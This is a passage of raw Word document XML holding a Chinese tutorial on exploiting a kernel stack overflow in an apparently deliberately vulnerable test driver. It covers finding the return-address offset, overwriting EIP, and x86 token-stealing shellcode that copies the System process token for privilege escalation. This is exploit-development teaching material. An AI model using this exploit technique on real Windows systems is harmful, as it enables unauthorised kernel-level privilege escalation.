            <wp:docPr id="8" name="图片 8" descr="egisters Disassembly Memory &#10;Command &#10;PBCKerne1StackOverF10w! sub 0123+Ox8e: &#10;D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isters Disassembly Memory &#10;Command &#10;PBCKerne1StackOverF10w! sub 0123+Ox8e: &#10;Dis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52C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357B0F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写入是写入进去了，但是并没有覆盖掉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和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（将0x41写入寄存器）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D6899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08832BD" wp14:editId="740F493C">
            <wp:extent cx="7315200" cy="4165600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="ebugView on (local) &#10;File Edit Capture Options Computer Help &#10;Time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bugView on (local) &#10;File Edit Capture Options Computer Help &#10;Time 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802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BCA8E4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34C182F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R3的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>UserBuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>长度增加到0x900在来运行一下，看一看效果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA7F5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9797511" wp14:editId="138CC0CE">
            <wp:extent cx="6096000" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="ommand - Kernel 'com:port=com1,baud=115200' - Win[ &#10;f8daf6db 8be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mmand - Kernel 'com:port=com1,baud=115200' - Win[ &#10;f8daf6db 8be5 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3A98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到了这里，成功的将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、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覆盖掉了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8BB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4FC08A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那么，现在，就要正确的找出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、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在函数栈帧中的offset，然后改写他们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2880E2D8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738B48C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逆向一下驱动，看一看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的offset：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417462C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9CD5815" wp14:editId="75B8EEC6">
            <wp:extent cx="6096000" cy="4885055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="Ζτς &#10;sseappe &#10;aa33naaesn„ &#10;ssaappe aa33naaesn„ &#10;8 &#10;dqa &#10;dqa 1 dsa &#10;'08¯aeA+dqe] 'xea &#10;'dsa &#10;008¯aeA+dqa] &#10;ssaappv+dqa] 'xea &#10;[ I xpa &#10;8 'dsa &#10;Tsae33nqTaaaaye &#10;qoog &#10;8 'dsa &#10;Wae33nqTaaaaye &#10;8 'dsa &#10;azTsaa33nqaasne &#10;[ •4unooxeH+dqa] 'xea &#10;8 'dsa &#10;appyaa33nqaasne &#10;xpa &#10;ssaappv+dqa] •'xpa &#10;peauaoaaqoad : ΒΡ &#10;ssaappy &#10;ssaappv+dqa] &#10;TWEaa'l &#10;ΤΥ &#10;ΤΡΙ* &#10;Ο &#10;11008 &#10;dsa &#10;[ 1 xea &#10;ο &#10;'08 ¯ae.'+dqa ] &#10;dsa &#10;dsa &#10;dqa &#10;dqa &#10;dod &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;qsnd &#10;qns &#10;qs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Ζτς &#10;sseappe &#10;aa33naaesn„ &#10;ssaappe aa33naaesn„ &#10;8 &#10;dqa &#10;dqa 1 dsa &#10;'08¯aeA+dqe] 'xea &#10;'dsa &#10;008¯aeA+dqa] &#10;ssaappv+dqa] 'xea &#10;[ I xpa &#10;8 'dsa &#10;Tsae33nqTaaaaye &#10;qoog &#10;8 'dsa &#10;Wae33nqTaaaaye &#10;8 'dsa &#10;azTsaa33nqaasne &#10;[ •4unooxeH+dqa] 'xea &#10;8 'dsa &#10;appyaa33nqaasne &#10;xpa &#10;ssaappv+dqa] •'xpa &#10;peauaoaaqoad : ΒΡ &#10;ssaappy &#10;ssaappv+dqa] &#10;TWEaa'l &#10;ΤΥ &#10;ΤΡΙ* &#10;Ο &#10;11008 &#10;dsa &#10;[ 1 xea &#10;ο &#10;'08 ¯ae.'+dqa ] &#10;dsa &#10;dsa &#10;dqa &#10;dqa &#10;dod &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;qsnd &#10;ppe &#10;ΤΤΡΟ &#10;qsnd &#10;qsnd &#10;qsnd &#10;qns &#10;qsnd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F7DD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877A543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当驱动进入该函数后，先将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>入栈，然后</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>向上抬高了0x804的长度，那么，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的位置应该是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010BDC3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 xml:space="preserve">0x804 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(DWORD)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C4B3A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55AEC5B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将攻击函数改写一下，然后看一下是否可以命中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE3D406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2AD1744" wp14:editId="556276ED">
            <wp:extent cx="6096000" cy="2014855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="IZE T Size &#10;ULONCJ result &#10;— (512) * sizeof (ULONG) + sizeof (NTSTATUS) + sizeof (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ZE T Size &#10;ULONCJ result &#10;— (512) * sizeof (ULONG) + sizeof (NTSTATUS) + sizeof (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BC2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6C3F31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重新编译，执行后，成功的命中了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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650B747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D79392A" wp14:editId="6E92DCA4">
            <wp:extent cx="6096000" cy="2616200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="ommand - Kernel - WInDbg:6.11.0001.404 X8 &#10;cax,dword ptr [obp—804h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mmand - Kernel - WInDbg:6.11.0001.404 X8 &#10;cax,dword ptr [obp—804h]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41269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7893041B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下面，就来准备shellcode，并改写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中的内容为我们shellcode的指针。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B118854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2AA7D68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先来分析一下我们shellcode的功能：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEEFD7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找到windows系统进程system进程（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>processId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 4），然后找到该进程的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>EProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>结构，拷贝该结构中的token成员到我们的攻击进程中，有了token，我们就可以欺骗操作系统，达到提权的目的了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3ADF3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4550884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改写攻击函数，加入shellcode：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D345D23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3277E5C" wp14:editId="6D274FC8">
            <wp:extent cx="6096000" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr=" (((ULONG) Buffer + Size) &#10;sizeof (UL()NG &#10;shel ICodeAddr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(((ULONG) Buffer + Size) &#10;sizeof (UL()NG &#10;shel ICodeAddres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CF7E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在来将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>的值改写为我们的shellcode地址，来看一看shellcode的实现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756156E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pushad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保存当前线程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU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现场</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C80CBCA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xor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</w:p>
    <w:p w14:paraId="5416F260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fs:[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CurrentThreadOffset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提取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>!_</w:t>
      </w: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KPCR.ProbData.CurrentThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F5D3F9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获取当前进程的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结构地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075D6138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eax;eax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后面会发生改变，用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来保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24676142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>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>edx,SystemPID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>searchSystemID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0AF87F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FlinkOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>];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找到当前进程所在的进程链表，获取下一个进程的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结构指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EBD99C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r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sub 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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FlinkOffset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从链表中找到下一个结点的地址后，在减去结点在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结构中的偏移，就得到了下一个进程的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EProcess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的起始地址了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B07F55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cmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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ProcessIdOffset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],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比较当前进程的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>是否为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>systemPid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B5CB365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jne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searchSystemID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E5B15E3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, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eax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TokenOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67638A64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mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ecx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 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TokenOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>找到后，替换到我们的攻击程序中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C111DD" w14:textId="77777777" w:rsidR="00C06777" w:rsidRDefault="00C06777" w:rsidP="00C06777">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>popad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39D74EEF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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC0636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重新编译，执行，挂</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>windbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>看一下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468701DC" w14:textId="77777777" w:rsidR="00C06777" w:rsidRDefault="00C06777" w:rsidP="00C06777">
      <w:pPr>
        <w:pStyle w:val="a3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82CACFC" wp14:editId="04F506CF">
            <wp:extent cx="6096000" cy="6807200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="isassembly &#10;eax, eax &#10;ecx, eax &#10;Offset: &#10;079c2 &#10;b930000000 &#10;4079c7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sassembly &#10;eax, eax &#10;ecx, eax &#10;Offset: &#10;079c2 &#10;b930000000 &#10;4079c7 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3042" w14:textId="77777777" w:rsidR="00C06777" w:rsidRDefault="00C06777" w:rsidP="00C06777">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing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成功的将system进程的process token拷贝到了我们的r3程序中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CB3DEE" w14:textId="77777777" w:rsidR="00344E8E" w:rsidRDefault="00344E8E"/>
    <w:sectPr w:rsidR="00344E8E" w:rsidSect="00EF6CA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777"/>
    <w:rsid w:val="00344E8E"/>
    <w:rsid w:val="00697F62"/>
    <w:rsid w:val="00C06777"/>
    <w:rsid w:val="00E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53F8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677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TML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C06777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9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429</Words>
  <Characters>2447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447756148@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>447756148@qq.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-24T01:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-27T15:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>